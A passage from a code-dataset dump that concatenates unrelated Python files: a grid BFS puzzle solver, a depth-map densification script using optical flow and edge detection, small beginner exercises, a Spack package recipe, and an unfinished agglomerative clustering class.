world!\"\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"305167146","text":"import sys\nsys.stdin = open('P2.txt')\nT = int(input())\nD = [(1, 0), (0, 1), (-1, 0), (0, -1)]\ndef find(y, x):\n global dis\n queue = []\n queue.append((y, x))\n L = 0\n while queue:\n y,x = queue.pop(0)\n for dy, dx in D:\n nx = x + dx\n ny = y + dy\n if 0 <= nx < 10 and 0 <= ny < 10:\n queue.append((ny,nx))\n if arr[ny][nx] != 0 and arr[ny][nx] != 9:\n dis += L\n arr[ny][nx] =0\n arr[y][x] =0\n return\n L += 1\n\n\nfor tc in range(T):\n N = int(input())\n arr = [list(map(int,input().split())) for _ in range(10)]\n dis = 0\n for i in range(10):\n for j in range(10):\n if arr[i][j] == 9:\n find(i,j)\n print('#{} {}'.format(tc+1, dis))","sub_path":"08_algorithm/al.t/P2.과자먹기.py","file_name":"P2.과자먹기.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"467102193","text":"import cv2\nfrom cv2 import DISOpticalFlow\nimport numpy as np\nfrom pyquaternion import Quaternion\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.sparse\nimport scipy.sparse.linalg\nimport copy\nimport sys\nimport pdb\nimport pickle\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\nimport matplotlib as mpl\nimport matplotlib.cm as cm\n\nsys.path.append('../utils')\nfrom bilateral_filter import bilateral_filter\n\ninput_frames = \"sample_data/frames/\"\ninput_colmap = \"sample_data/reconstruction/\"\noutput_folder = \"output/\"\n\ndump_debug_images = True\n\n# Algorithm parameters. See the paper for details.\n\ntau_high = 0.1\ntau_low = 0.1\ntau_flow = 0.2\nk_I = 5\nk_T = 7\nk_F = 31\nlambda_d = 1\nlambda_t = 0.01\nlambda_s = 1\n\nnum_solver_iterations = 500\n\nclass Reconstruction:\n def __init__(self):\n self.cameras = {}\n self.views = {}\n self.points3d = {}\n self.min_view_id = -1\n self.max_view_id = -1\n self.image_folder = \"\"\n \n def ViewIds(self):\n return list(self.views.keys())\n \n def GetNeighboringKeyframes(self, view_id):\n previous_keyframe = -1\n next_keyframe = -1\n for idx in range(view_id - 1, self.min_view_id, -1):\n if idx not in self.views:\n continue\n if self.views[idx].IsKeyframe():\n previous_keyframe = idx\n break\n for idx in range(view_id + 1, self.max_view_id):\n if idx not in self.views:\n continue\n if self.views[idx].IsKeyframe():\n next_keyframe = idx\n break\n if previous_keyframe < 0 or next_keyframe < 0:\n return np.array([])\n return [previous_keyframe, next_keyframe]\n \n def GetReferenceFrames(self, view_id):\n kf = self.GetNeighboringKeyframes(view_id)\n if (len(kf) < 2):\n return []\n dist = np.linalg.norm(self.views[kf[1]].Position() -\\\n self.views[kf[0]].Position()) / 2\n pos = self.views[view_id].Position()\n ref = []\n for idx in range(view_id + 1, self.max_view_id):\n if idx not in self.views:\n continue\n if (np.linalg.norm(pos -\\\n self.views[idx].Position()) > dist):\n ref.append(idx)\n break\n for idx in range(view_id - 1, self.min_view_id, -1):\n if idx not in self.views:\n continue\n if (np.linalg.norm(pos -\\\n self.views[idx].Position()) > dist):\n ref.append(idx)\n break\n return ref\n\n def GetImage(self, view_id):\n return self.views[view_id].GetImage(self.image_folder)\n \n def GetSparseDepthMap(self, frame_id):\n camera = self.cameras[self.views[frame_id].camera_id]\n view = self.views[frame_id]\n view_pos = view.Position()\n depth_map = np.zeros((camera.height, camera.width), dtype=np.float32)\n for point_id, coord in view.points2d.items():\n pos3d = self.points3d[point_id].position3d\n depth = np.linalg.norm(pos3d - view_pos)\n depth_map[int(coord[1]), int(coord[0])] = depth\n return depth_map\n \n def Print(self):\n print(\"Found \" + str(len(self.views)) + \" cameras.\")\n for id in self.cameras:\n self.cameras[id].Print()\n print(\"Found \" + str(len(self.views)) + \" frames.\")\n for id in self.views:\n self.views[id].Print()\n\nclass Point:\n def __init__(self):\n self.id = -1\n self.position3d = np.zeros(3, float)\n \n \nclass Camera:\n\n def __init__(self):\n self.id = -1\n self.width = 0\n self.height = 0\n self.focal = np.zeros(2,float)\n self.principal = np.zeros(2,float)\n self.model = \"\"\n \n def Print(self):\n print(\"Camera \" + str(self.id))\n print(\"-Image size: (\" + str(self.width) + \\\n \", \" + str(self.height) + \")\")\n print(\"-Focal: \" + str(self.focal))\n print(\"-Model: \" + self.model)\n print(\"\")\n\nclass View: \n def __init__(self):\n self.id = -1\n self.orientation = Quaternion()\n self.translation = np.zeros(3, float)\n self.points2d = {}\n self.camera_id = -1\n self.name = \"\"\n \n def IsKeyframe(self):\n return len(self.points2d) > 0\n \n def Rotation(self):\n return self.orientation.rotation_matrix\n \n def Position(self):\n return self.orientation.rotate(self.translation)\n \n def GetImage(self, image_folder):\n mat = cv2.imread(image_folder + \"/\" + self.name)\n # Check that we loaded correctly.\n assert mat is not None, \\\n \"Image \" + self.name + \" was not found in \" \\\n + image_folder\n return mat\n \n def Print(self):\n print(\"Frame \" + str(self.id) + \": \" + self.name)\n print(\"Rotation: \\n\" + \\\n str(self.Rotation()))\n print(\"Position: \\n\" + \\\n str(self.Position()))\n print(\"\")\n \ndef ReadColmapCamera(filename):\n file = open(filename, \"r\")\n line = file.readline()\n cameras = {}\n while (line):\n if (line[0] != '#'):\n tokens = line.split()\n id_value = int(tokens[0])\n cameras[id_value] = Camera()\n cameras[id_value].id = id_value\n cameras[id_value].model = tokens[1]\n # Currently we're assuming that the camera model\n # is in the SIMPLE_RADIAL format\n assert(cameras[id_value].model == \"PINHOLE\")\n cameras[id_value].width = int(tokens[2])\n cameras[id_value].height = int(tokens[3])\n cameras[id_value].focal[0] = float(tokens[4])\n cameras[id_value].focal[1] = float(tokens[5])\n cameras[id_value].principal[0] = float(tokens[6])\n cameras[id_value].principal[1] = float(tokens[7])\n line = file.readline()\n return cameras;\n\ndef ReadColmapImages(filename):\n file = open(filename, \"r\")\n line = file.readline()\n views = {}\n while (line):\n if (line[0] != '#'):\n tokens = line.split()\n id_value = int(tokens[0])\n views[id_value] = View()\n views[id_value].id = id_value\n views[id_value].orientation = Quaternion(float(tokens[1]), \\\n float(tokens[2]), \\\n float(tokens[3]), \\\n float(tokens[4]))\n views[id_value].translation[0] = float(tokens[5])\n views[id_value].translation[1] = float(tokens[6])\n views[id_value].translation[2] = float(tokens[7])\n views[id_value].camera_id = int(tokens[8])\n views[id_value].name = tokens[9]\n line = file.readline()\n tokens = line.split()\n views[id_value].points2d = {}\n for idx in range(0, len(tokens) // 3):\n point_id = int(tokens[idx * 3 + 2])\n coord = np.array([float(tokens[idx * 3 + 0]), \\\n float(tokens[idx * 3 + 1])])\n views[id_value].points2d[point_id] = coord\n \n # Read the observations...\n line = file.readline()\n return views\n \ndef ReadColmapPoints(filename):\n file = open(filename, \"r\")\n line = file.readline()\n points = {}\n while (line):\n if (line[0] != '#'):\n tokens = line.split()\n id_value = int(tokens[0])\n points[id_value] = Point()\n points[id_value].id = id_value\n points[id_value].position3d = np.array([float(tokens[1]), \\\n float(tokens[2]), \\\n float(tokens[3])])\n \n line = file.readline()\n return points\n \n \n \ndef ReadColmap(poses_folder, images_folder):\n # Read the cameras (intrinsics)\n recon = Reconstruction()\n recon.image_folder = images_folder\n recon.cameras = ReadColmapCamera(poses_folder + \"/cameras.txt\")\n recon.views = ReadColmapImages(poses_folder + \"/images.txt\")\n recon.points3d = ReadColmapPoints(poses_folder + \"/points3D.txt\")\n recon.min_view_id = min(list(recon.views.keys()))\n recon.max_view_id = max(list(recon.views.keys()))\n print(\"Number of points: \" + str(len(recon.points3d)))\n print(\"Number of frames: \" + str(len(recon.views)))\n #assert len(recon.views) == (recon.max_view_id - recon.min_view_id) + 1, \"Min\\max: \" + str(recon.max_view_id) + \" \" + str(recon.min_view_id)\n return recon\n\nimport flow_color\n\ndis = DISOpticalFlow.create(2)\ndef GetFlow(image1, image2):\n flow = np.zeros((image1.shape[0], image1.shape[1], 2), np.float32)\n flow = dis.calc(\\\n cv2.cvtColor(image1,cv2.COLOR_BGR2GRAY),\\\n cv2.cvtColor(image2,cv2.COLOR_BGR2GRAY), flow)\n return flow\n\ndef AbsoluteMaximum(images):\n assert(len(images) > 0)\n output = images[0]\n for i in range(1,len(images)):\n output[np.abs(images[i]) > np.abs(output)] = images[i][np.abs(images[i]) > np.abs(output)]\n return output\n\ndef GetImageGradient(image):\n xr,xg,xb = cv2.split(cv2.Sobel(image,cv2.CV_64F,1,0,ksize=5))\n yr,yg,yb = cv2.split(cv2.Sobel(image,cv2.CV_64F,0,1,ksize=5))\n img_grad_x = AbsoluteMaximum([xr,xg,xb])\n img_grad_y = AbsoluteMaximum([yr,yg,yb])\n \n return img_grad_x, img_grad_y\n\ndef GetGradientMagnitude(img_grad_x, img_grad_y):\n img_grad_magnitude = cv2.sqrt((img_grad_x * img_grad_x) \\\n + (img_grad_y * img_grad_y))\n return img_grad_magnitude\n\ndef GetFlowGradientMagnitude(flow, img_grad_x, img_grad_y):\n x1,x2 = cv2.split(cv2.Sobel(flow,cv2.CV_64F,1,0,ksize=5))\n y1,y2 = cv2.split(cv2.Sobel(flow,cv2.CV_64F,0,1,ksize=5))\n flow_grad_x = AbsoluteMaximum([x1,x2])\n flow_grad_y = AbsoluteMaximum([y1,y2])\n flow_gradient_magnitude = cv2.sqrt((flow_grad_x * flow_grad_x) \\\n + (flow_grad_y * flow_grad_y))\n reliability = np.zeros((flow.shape[0], flow.shape[1]))\n\n for x in range(0, flow.shape[0]):\n for y in range(1, flow.shape[1]):\n magn = (img_grad_x[x,y] * img_grad_x[x,y]) + \\\n (img_grad_y[x,y] * img_grad_y[x,y])\n gradient_dir = np.array((img_grad_y[x,y], img_grad_x[x,y]))\n if (np.linalg.norm(gradient_dir) == 0):\n reliability[x,y] = 0\n continue\n gradient_dir = gradient_dir / np.linalg.norm(gradient_dir)\n center_pixel = np.array((x,y))\n p0 = center_pixel + gradient_dir\n p1 = center_pixel - gradient_dir\n if p0[0] < 0 or p1[0] < 0 or p0[1] < 0 or p1[1] < 0 \\\n or p0[0] >= flow.shape[0] or p0[1] >= flow.shape[1] or \\\n p1[0] >= flow.shape[0] or p1[1] >= flow.shape[1]:\n reliability[x,y] = -1000\n continue\n f0 = flow[int(p0[0]), int(p0[1])].dot(gradient_dir)\n f1 = flow[int(p1[0]), int(p1[1])].dot(gradient_dir)\n reliability[x,y] = f1 - f0\n\n return flow_gradient_magnitude, reliability\n\ndef GetSoftEdges(image, flows):\n img_grad_x, img_grad_y = GetImageGradient(image)\n img_grad_magnitude = GetGradientMagnitude(img_grad_x, img_grad_y)\n if (dump_debug_images):\n plt.imsave(output_folder + \"/image_gradient.png\", \\\n img_grad_magnitude)\n flow_gradient_magnitude = np.zeros(img_grad_magnitude.shape)\n \n max_reliability = np.zeros(flow_gradient_magnitude.shape)\n i = 0\n for flow in flows:\n magnitude, reliability = GetFlowGradientMagnitude(flow, img_grad_x, img_grad_y)\n if (dump_debug_images):\n plt.imsave(output_folder + \"/flow_\" + str(i) + \".png\", \\\n flow_color.computeImg(flow)) \n plt.imsave(output_folder + \"/reliability_\" + str(i) + \".png\", \\\n reliability)\n flow_gradient_magnitude[reliability > max_reliability] = magnitude[reliability > max_reliability]\n i += 1\n \n if (dump_debug_images):\n plt.imsave(output_folder + \"/flow_gradient.png\", \\\n flow_gradient_magnitude)\n flow_gradient_magnitude = \\\n cv2.GaussianBlur(flow_gradient_magnitude,(k_F, k_F),0)\n flow_gradient_magnitude *= img_grad_magnitude\n flow_gradient_magnitude /= flow_gradient_magnitude.max()\n return flow_gradient_magnitude\n \ndef Canny(soft_edges, image):\n image = cv2.GaussianBlur(image, (k_I, k_I), 0)\n xr,xg,xb = cv2.split(cv2.Sobel(image,cv2.CV_64F,1,0,ksize=5))\n yr,yg,yb = cv2.split(cv2.Sobel(image,cv2.CV_64F,0,1,ksize=5))\n img_gradient = cv2.merge((AbsoluteMaximum([xr,xg,xb]),AbsoluteMaximum([yr,yg,yb])))\n \n TG22 = 13573\n \n gx,gy = cv2.split(img_gradient * (2**15))\n mag = cv2.sqrt((gx * gx) \\\n + (gy * gy))\n seeds = []\n edges = np.zeros(mag.shape)\n for x in range(1, img_gradient.shape[0] - 1):\n for y in range(1, img_gradient.shape[1] - 1):\n ax = int(abs(gx[x,y]))\n ay = int(abs(gy[x,y])) << 15\n tg22x = ax * TG22\n m = mag[x,y]\n if (ay < tg22x):\n if (m > mag[x,y-1] and\\\n m >= mag[x,y+1]):\n #suppressed[x,y] = m\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n else:\n tg67x = tg22x + (ax << 16)\n if (ay > tg67x):\n if (m > mag[x+1,y] and m >= mag[x-1,y]):\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n else:\n if (int(gx[x,y]) ^ int(gy[x,y]) < 0):\n if (m > mag[x-1,y+1] and m >= mag[x+1,y-1]):\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n else:\n if (m > mag[x-1,y-1] and m > mag[x+1,y+1]):\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n w = img_gradient.shape[0] - 1\n h = img_gradient.shape[1] - 1\n if (dump_debug_images):\n plt.imsave(output_folder + \"/edge_seeds.png\", \\\n edges == 255)\n plt.imsave(output_folder + \"/edge_all_possible.png\", \\\n edges == 1)\n while len(seeds) > 0:\n (x,y) = seeds.pop()\n \n if (x < w and y < h and edges[x+1,y+1] == 1):\n edges[x+1,y+1] = 255\n seeds.append((x+1,y+1))\n if (x > 0 and y < h and edges[x-1,y+1] == 1):\n edges[x-1,y+1] = 255\n seeds.append((x-1,y+1))\n if (y < h and edges[x,y+1] == 1):\n edges[x,y+1] = 255\n seeds.append((x,y+1))\n if (x < w and y > 0 and edges[x+1,y-1] == 1):\n edges[x+1,y-1] = 255\n seeds.append((x+1,y-1))\n if (x > 0 and y > 0 and edges[x-1,y-1] == 1):\n edges[x-1,y-1] = 255\n seeds.append((x-1,y-1))\n if (y > 0 and edges[x,y-1] == 1):\n edges[x,y-1] = 255\n seeds.append((x,y-1))\n if (x < w and edges[x+1,y] == 1):\n edges[x+1,y] = 255\n seeds.append((x+1,y))\n if (x > 0 and edges[x-1,y] == 1):\n edges[x-1,y] = 255\n seeds.append((x-1,y))\n edges[edges == 1] = 0\n return edges\n \ndef GetInitialization(sparse_points, last_depth_map):\n initialization = sparse_points.copy()\n if last_depth_map.size > 0:\n initialization[last_depth_map > 0] = 1.0 / last_depth_map[last_depth_map > 0]\n \n w = edges.shape[0]\n h = edges.shape[1]\n last_known = -1\n first_known = -1\n for col in range(0,w):\n for row in range(0,h):\n if (sparse_points[col, row] > 0):\n last_known = 1.0 / sparse_points[col, row]\n elif (initialization[col, row] > 0):\n last_known = initialization[col, row]\n if (first_known < 0):\n first_known = last_known\n initialization[col, row] = last_known\n initialization[initialization < 0] = first_known\n \n return initialization\n \n \ndef DensifyFrame(sparse_points, hard_edges, soft_edges, last_depth_map):\n w = sparse_points.shape[0]\n h = sparse_points.shape[1]\n num_pixels = w * h\n A = scipy.sparse.dok_matrix((num_pixels * 3, num_pixels), dtype=np.float32)\n A[A > 0] = 0\n A[A < 0] = 0\n b = np.zeros(num_pixels * 3, dtype=np.float32)\n x0 = np.zeros(num_pixels, dtype=np.float32)\n num_entries = 0\n \n smoothness = np.maximum(1 - soft_edges, 0)\n smoothness_x = np.zeros((w,h), dtype=np.float32)\n smoothness_y = np.zeros((w,h), dtype=np.float32)\n initialization = GetInitialization(sparse_points, last_depth_map)\n \n if (dump_debug_images):\n plt.imsave(output_folder + \"/solver_initialization\" + \".png\", \\\n initialization)\n plt.imsave(output_folder + \"/sparse_points_\" + \".png\", \\\n sparse_points)\n plt.imsave(output_folder + \"/soft_edges_\" + \".png\", \\\n soft_edges)\n plt.imsave(output_folder + \"/hard_edges_\" + \".png\", \\\n hard_edges)\n \n for row in range(1,h - 1):\n for col in range(1,w - 1):\n x0[col + row * w] = initialization[col, row]\n # Add the data constraints\n if (sparse_points[col, row] > 0.00):\n A[num_entries, col + row * w] = lambda_d\n b[num_entries] = (1.0 / sparse_points[col, row]) * lambda_d\n num_entries += 1\n elif (last_depth_map.size > 0 and last_depth_map[col, row] > 0):\n A[num_entries, col + row * w] = lambda_t\n b[num_entries] = (1.0 / last_depth_map[col, row]) * lambda_t\n num_entries += 1\n \n # Add the smoothness constraints\n smoothness_weight = lambda_s * min(smoothness[col, row], \\\n smoothness[col - 1, row])\n if (hard_edges[col, row] == hard_edges[col - 1, row]):\n smoothness_x[col,row] = smoothness_weight\n A[num_entries, (col - 1) + row * w] = smoothness_weight\n A[num_entries, col + row * w] = -smoothness_weight\n b[num_entries] = 0\n num_entries += 1\n \n smoothness_weight = lambda_s * min(smoothness[col,row], \\\n smoothness[col, row - 1])\n if (hard_edges[col,row] == hard_edges[col, row - 1]):\n smoothness_y[col,row] = smoothness_weight\n A[num_entries, col + (row - 1) * w] = smoothness_weight\n A[num_entries, col + row * w] = -smoothness_weight\n b[num_entries] = 0\n num_entries += 1\n \n \n # Solve the system\n if (dump_debug_images):\n plt.imsave(output_folder + \"/solver_smoothness_x_\" + \".png\", \\\n smoothness_x)\n plt.imsave(output_folder + \"/solver_smoothness_y_\" + \".png\", \\\n smoothness_y)\n\n [x,info] = scipy.sparse.linalg.cg(A.transpose() * A, \\\n A.transpose() * b, x0, 1e-05, num_solver_iterations)\n if info < 0:\n print(\"====> Error! Illegal input!\")\n elif info > 0:\n print(\"====> Ran \" + str(info) + \" solver iterations.\")\n else:\n print(\"====> Solver converged!\")\n \n depth = np.zeros(sparse_points.shape, dtype=np.float32)\n\n # Copy back the pixels\n for row in range(0,h):\n for col in range(0,w):\n dis = x[col + row * w]\n if dis > 0:\n depth[col,row] = 1.0 / dis\n\n return depth\n\ndef TemporalMedian(depth_maps):\n lists = {}\n depth_map = depth_maps[0].copy()\n h = depth_map.shape[0]\n w = depth_map.shape[1]\n for row in range(0,h):\n for col in range(0,w):\n values = []\n for img in depth_maps:\n if (img[row,col] > 0):\n values.append(img[row, col])\n if len(values) > 0:\n depth_map[row,col] = np.median(np.array(values))\n else:\n depth_map[row,col] = 0\n return depth_map\n\ndef generate_pointcloud(rgb, depth, intrinsics=None, ply_file=None):\n points = []\n if intrinsics is not None:\n fx = intrinsics[0, 0]\n fy = intrinsics[1, 1]\n cx = intrinsics[0, 2]\n cy = intrinsics[1, 2]\n\n for v in range(rgb.shape[0]):\n for u in range(rgb.shape[1]):\n color = rgb[v, u, :]\n Z = depth[v, u]\n if Z==0:\n continue\n if intrinsics is not None:\n X = (u - cx) * Z / fx\n Y = (v - cy) * Z / fy\n else:\n X = u\n Y = v\n points.append(\"%f %f %f %d %d %d 0\\n\"%(X,Y,Z,color[0],color[1],color[2]))\n file = open(ply_file,\"w\")\n file.write('''ply\n format ascii 1.0\n element vertex %d\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n property uchar alpha\n end_header\n %s\n '''%(len(points),\"\".join(points)))\n file.close()\n\ndef generate_pc_kinect(rgb, depth, pc_pred_path):\n P_rect = np.eye(3, 3)\n P_rect[0,0] = 400.516317\n P_rect[0,2] = 320.171183\n P_rect[1,1] = 400.410970\n P_rect[1,2] = 243.274495\n\n # build_output_dir(output_folder)\n generate_pointcloud(rgb, depth, intrinsics=P_rect, ply_file=pc_pred_path)\n\nif __name__ == \"__main__\":\n last_depths = []\n last_depth = np.array([])\n\n data_path = '/home/nod/project/dso/build/sample/000068.pkl'\n data = open(data_path,\"rb\")\n data_dict = pickle.load(data)\n\n rgb = data_dict['rgb']\n depth_pred = data_dict['depth_pred'] * 0.7131490173152352\n depth_dso = np.array(Image.open('/home/nod/project/dso/build/sample/00023.png'), np.float) * 0.00666\n depth_gt = np.array(data_dict['depth_gt'], np.float) / 1000\n\n rgb_before = np.array(Image.open('/home/nod/project/dso/build/sample/00065.jpg'))\n rgb_after = np.array(Image.open('/home/nod/project/dso/build/sample/00071.jpg'))\n depth_pred_image = np.array(Image.open('/home/nod/project/dso/build/sample/depth_pred.png'))\n\n base_img = rgb\n flows = []\n flows.append(GetFlow(base_img, rgb_before))\n flows.append(GetFlow(base_img, rgb_after))\n soft_edges = GetSoftEdges(base_img, flows)\n edges = Canny(soft_edges, base_img)\n\n depth_final = DensifyFrame(depth_dso, edges, soft_edges, last_depth)\n data_dict = {'depth_densify': depth_final,\n 'rgb': rgb,\n 'depth_pred': depth_pred,\n 'depth_dso': depth_dso,\n 'depth_gt': depth_gt,\n 'soft_edges': soft_edges,\n 'edge': edges,\n 'flows': flows}\n dict_file_name = '/home/nod/project/dso/build/sample/00068_densify.pkl'\n f = open(dict_file_name,\"wb\")\n pickle.dump(data_dict, f)\n f.close()\n\n # depth_final = DensifyFrame(sparse_points, soft_edges, dense_points) * 100\n # depth_final = depth_gt\n # depth_final = bilateral_filter(depth_pred_image, depth_dso)\n\n plt.imshow(depth_final)\n plt.show(block=True)\n import pdb; pdb.set_trace()\n pc_path = '/home/nod/project/dso/build/sample/00068.ply'\n generate_pc_kinect(rgb, depth_final, pc_path)","sub_path":"densify/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":24509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"132295562","text":"\"\"\"\nMadelyn Reyes\nSeptember 18, 2015\nTravelling Distance\n\"\"\"\nspeed = int(input('What is the speed of the vehicle in mph? ')) #asking user for speed\nhour = int(input('How many hours has it traveled? ')) #asking user for hours/time\ndistance= 1\n\nprint(\"Hour\\tDistance traveled\") #making table\nprint('-------------------------') #making line\n\n\nfor hour in range(1,hour+1): # for the variable hour that the user inputs, \n distance = speed * hour #distance formula\n print(hour,\"\\t\",distance) #printing output\n\n \n\n\n\n","sub_path":"travellingdistance.py","file_name":"travellingdistance.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"543802066","text":"\ncont=soma=0\nwhile True:\n n=int(input('Digite um valor (999 para parar):'))\n if n==999:\n break\n soma+=n\n cont+=1\n \nprint(f'Você digitou {cont} valores\\ne a soma deles é igual a {soma}')\n\n","sub_path":"EXERCÍCIOS_CURSO-EM-VIDEO/ex_WHILE_TRUE.py","file_name":"ex_WHILE_TRUE.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"449901246","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack.package import *\n\n\nclass PyBuild(PythonPackage):\n \"\"\"A simple, correct PEP517 package builder.\"\"\"\n\n homepage = \"https://github.com/pypa/build\"\n pypi = \"build/build-0.7.0.tar.gz\"\n\n version(\"0.7.0\", sha256=\"1aaadcd69338252ade4f7ec1265e1a19184bf916d84c9b7df095f423948cb89f\")\n\n variant(\"virtualenv\", default=False, description=\"Install optional virtualenv dependency\")\n\n depends_on(\"python@3.6:\", type=(\"build\", \"run\"))\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"py-packaging@19:\", type=(\"build\", \"run\"))\n depends_on(\"py-pep517@0.9.1:\", type=(\"build\", \"run\"))\n depends_on(\"py-tomli@1:\", type=(\"build\", \"run\"))\n depends_on(\"py-colorama\", when=\"platform=windows\", type=(\"build\", \"run\"))\n depends_on(\"py-importlib-metadata@0.22:\", when=\"^python@:3.7\", type=(\"build\", \"run\"))\n depends_on(\"py-virtualenv@20.0.35:\", when=\"+virtualenv\", type=(\"build\", \"run\"))\n\n # https://github.com/pypa/build/issues/266\n # https://github.com/pypa/build/issues/406\n patch(\"isolation.patch\", when=\"@0.7.0\")\n","sub_path":"var/spack/repos/builtin/packages/py-build/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"385888419","text":"import pickle\nimport os\nimport argparse\nfrom pprint import pprint\nimport numpy as np\nimport math\nfrom scipy.cluster.hierarchy import dendrogram\nimport matplotlib.pyplot as plt\n\nclass Agglomerative_Hierarchical:\n \"\"\"\n This class contains functions which comprise the core implementation of agglomerative\n hierarchical clustering.\n\n @author : Naren Surampudi\n \"\"\"\n\n def matrix_min(self, matrix, traversed_points):\n \"\"\"\n This function returns the minimum value in matrix. Traverse points are avoided in\n minimum calculation.\n\n Parameters\n ----------\n matrix : list\n The matrix whose minimum element is to be calculated.\n traversed_points : list\n The list of points already traverse elsewhere.\n\n Returns\n -------\n type : list\n A list consisting of the minimum element's coordinates.\n \"\"\"\n min_val = 9999\n min_i = 0\n min_j = 0\n for i in range(len(matrix)):\n \tfor j in range(len(matrix[i])):\n \t\tif i not in traversed_points and j not in traversed_points:\n \t\t\tif matrix[i][j] < min_val and matrix[i][j] > 0:\n \t\t\t\tmin_val = matrix[i][j]\n \t\t\t\tmin_i = i\n \t\t\t\tmin_j = j\n\n return [min_i, min_j]\n\n def min_cluster_distance(self, matrix, cluster1, cluster2):\n \"\"\"\n This function calculates the minimum distance between two clusters of points.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster1 : list\n Cluster of points.\n cluster2 : list\n Cluster of points.\n\n Returns\n -------\n type : int\n Minimum distance between the two passed clusters.\n \"\"\"\n dist_list = []\n\n if isinstance(cluster1, int):\n \tcluster1 = [cluster1]\n elif isinstance(cluster2, int):\n \tcluster2 = [cluster2]\n for point1 in cluster1:\n \tfor point2 in cluster2:\n \t\tdist = matrix[point1][point2]\n \t\tif dist > 0:\n \t\t\tdist_list.append(dist)\n\n return min(dist_list)\n\n def max_cluster_distance(self, matrix, cluster1, cluster2):\n \"\"\"\n This function calculates the maximum distance between two clusters of points.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster1 : list\n Cluster of points.\n cluster2 : list\n Cluster of points.\n\n Returns\n -------\n type : int\n Maximum distance between the two passed clusters.\n \"\"\"\n dist_list = []\n\n if isinstance(cluster1, int):\n \tcluster1 = [cluster1]\n elif isinstance(cluster2, int):\n \tcluster2 = [cluster2]\n for point1 in cluster1:\n \tfor point2 in cluster2:\n \t\tdist = matrix[point1][point2]\n \t\tif dist > 0:\n \t\t\tdist_list.append(dist)\n\n return max(dist_list)\n\n def avg_cluster_distance(self, matrix, cluster1, cluster2):\n \"\"\"\n This function calculates the average distance between two clusters of points.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster1 : list\n Cluster of points.\n cluster2 : list\n Cluster of points.\n\n Returns\n -------\n type : int\n Average distance between the two passed clusters.\n \"\"\"\n dist_list = []\n\n if isinstance(cluster1, int):\n \tcluster1 = [cluster1]\n elif isinstance(cluster2, int):\n \tcluster2 = [cluster2]\n for point1 in cluster1:\n \tfor point2 in cluster2:\n \t\tdist = matrix[point1][point2]\n \t\tif dist > 0:\n \t\t\tdist_list.append(dist)\n\n return sum(dist_list) / ((len(cluster1) * len(cluster2)))\n\n def matrix_gen(self, matrix, cluster, flag):\n \"\"\"\n This function generates a new proximity matrix after cluster calculation.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster : list\n The newly formed cluster of points.\n flag : int\n A parameter that specifies the type of linkage to use.\n\n Returns\n -------\n type : list\n The newly calculated proximity matrix.\n \"\"\"\n matrix = np.asarray(matrix)\n dist_vector = []\n for cluster1 in range(matrix.shape[0]):\n \tif flag == 0:\n \t\tdist_vector.append(self.min_cluster_distance(matrix.tolist(), cluster, cluster1))\n \telif flag == 1:\n \t\tdist_vector.append(self.max_cluster_distance(matrix.tolist(), cluster, cluster1))\n \telif flag == 2:\n \t\tdist_vector.append(self.avg_cluster_distance(matrix.tolist(), cluster, cluster1))\n matrix = np.vstack((matrix, dist_vector))\n dist_vector.append(0)\n matrix = np.column_stack((matrix, np.asarray(dist_vector)))\n matrix.tolist()\n\n return matrix\n\n def clustering(self, matrix, flag):\n \"\"\"\n This function progressively performs agglomerative clustering. The heart of the entire\n class that calls all other relevant methods.\n\n Parameters\n ----------\n matrix : list\n The proximity matrix to be operated upon.\n flag : int\n A parameter that specifies the type of linkage to use.\n\n Returns\n -------\n type : list\n A list consisting of the final priority matrix and the linkage matrix.\n \"\"\"\n total = len(matrix[0])\n K = 1\n linkage_matrix = np.zeros(shape=(total-1, 4))\n traversed_points = []\n cluster_numbers = {}\n lflag = total\n\n while K < total:\n \tcluster = self.matrix_min(matrix, traversed_points)\n \tif cluster[0] not in traversed_points and cluster[1] not in traversed_points:\n \t\tmatrix = self.matrix_gen(matrix, cluster, flag)\n \t\ttemp = 0\n \t\tif str(cluster[0]) in cluster_numbers.keys():\n \t\t\ttemp = temp + cluster_numbers[str(cluster[0])]\n \t\telse:\n \t\t\ttemp = temp + 1\n \t\tif str(cluster[1]) in cluster_numbers.keys():\n \t\t\ttemp = temp + cluster_numbers[str(cluster[1])]\n \t\telse:\n \t\t\ttemp = temp + 1\n \t\tlinkage_matrix[K-1] = 